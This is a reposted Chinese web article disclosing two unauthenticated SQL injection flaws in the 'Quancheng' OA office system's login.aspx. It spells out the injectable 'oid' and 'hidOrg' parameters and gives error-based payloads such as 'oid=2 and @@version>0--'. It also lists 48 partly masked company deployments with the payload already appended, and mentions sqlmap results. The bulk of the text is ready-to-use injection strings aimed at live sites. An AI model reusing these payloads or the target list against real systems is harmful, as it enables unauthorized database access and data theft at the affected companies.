1. 计算机技术网首页
  2. web服务器教学教程
  3. 企业安全

全程OA办公系统无需登录两处注入漏洞影响众多企业企业安全分享!

企业安全 阅读 2

全程OA办公系统无需登录两处注入漏洞影响众多企业
无需登录,如果要登录,那就没有任何意义~~
危害性很大,用户量很多,首页走起

全程OA办公系统无需登录两处注入漏洞影响众多企业


无需登录,如果要登录,那就没有任何意义~~
危害性很大,用户量很多,首页走起

官方案例巨多;涉及各个行业:
 

 https://**.**.**.**/Case/Default.aspx

全程OA办公系统无需登录两处注入漏洞影响众多企业

 

全程OA办公系统无需登录两处注入漏洞影响众多企业

 

全程OA办公系统无需登录两处注入漏洞影响众多企业

 

全程OA办公系统无需登录两处注入漏洞影响众多企业

等等…..

SQL注入点:
 

 第一处:/login.aspx?test=TestSystem&password=24om&oid=1&uid=   这里的oid参数存在显错模式注入  第二处:登录框的机构选项中“hidOrg”参数存在报错模式注入    这种OA系统的关键字太特么难找了。我就只能列举一部分了:
mask 区域 
 *****方de***** 1.https://**.**.**/om/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****??企业发?***** 2.https://**.**.**/c6//login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****???***** 3.https://**.**.**/wfb/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****产管理?***** 4.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****???***** 5.://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2&uid= _ ********** *****理集团?***** 6.://**.**.**/ehr/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****?旅游?***** 7.://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2/**/aND-/**/1=char(@@version)/**/%20--%20 &uid= _ ********** *****联科技?***** 8.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****教育?***** 9.https://**.**.**/gesanghua/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****???***** 10.https://**.**.**/lianfazhubao/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****??股份?***** 11.https://**.**.**/jurassic/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****营销?***** 12.https://**.**.**/000000/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****乐茶饮?***** ********** 13.https://**.**.**/gulixing2010/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****??服务?***** 14.https://**.**.**/cdjxnom/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****??技发?***** 15.https://**.**.**/klzx/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****技开发?***** 16.https://**.**.**/szswzn/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****?集团)?***** 17.https://**.**.**/shyzjpm/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****??限责?***** 18.https://**.**.**/jnuo2020/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****技有?***** 19.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****??术有?***** 20.https://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****???***** 21.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****??团有?***** 22.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****发中心?***** 23.https://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****??管理?***** 24.https://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****?外部设?***** 25.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****?江门)?***** 26.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****??理有?***** 27.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****贸有?***** 28.https://**.**.**/siekom/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****理咨询?***** 29.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****??信息服?***** 30.https://**.**.**/HR/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****??业园?***** 31.https://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****??技有?***** 32.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****??术有?***** 33.https://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--_ ********** *****??物资?***** 34.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--_ ********** *****??术有?***** 35.https://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****??地产开?***** 36.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****?研?***** 37.https://**.**.**/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _ ********** *****?官?***** 38.https://**.**.**/om/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** ********** *****息咨询?***** 39.https://**.**.**/oa/login.aspx  _ ********** *****?技开发?***** 40.https://**.**.**/sssw/login.aspx_ ********** *****??管理?***** 41.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****??术有?***** 42.https://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****???***** 43.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****??易有?***** 44.https://**.**.**/itianhuang/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****)MIS?***** 45.https://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****?网?***** 46.https://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****械设备?***** 47.https://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _ ********** *****筑有?***** 48.https://**.**.**/ahlf/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid=

第一处:

手工结果:
 

全程OA办公系统无需登录两处注入漏洞影响众多企业

sqlmap结果:

 全程OA办公系统无需登录两处注入漏洞影响众多企业

 

全程OA办公系统无需登录两处注入漏洞影响众多企业

第二处注入:

登录页面,审查机构的元素; 找到这行,将value="2" 改成 value="2 and user>0–" 就可以直接爆出user了。sqlmap就需要抓表单来进行跑了~
 

全程OA办公系统无需登录两处注入漏洞影响众多企业

 

全程OA办公系统无需登录两处注入漏洞影响众多企业

 

www.dengb.comtruehttps://www.dengb.com/qyaq/1095318.htmlTechArticle全程OA办公系统无需登录两处注入漏洞影响众多企业 无需登录,如果要登录,那就没有任何意义~~ 危害性很大,用户量很多,首页走起 官方…

—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>

本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。

ctvol管理联系方式QQ:251552304

本文章地址:https://www.ctvol.com/webstt/esecurity/100193.html

(0)
0
上一篇 2020年4月26日
下一篇 2020年4月26日

精彩推荐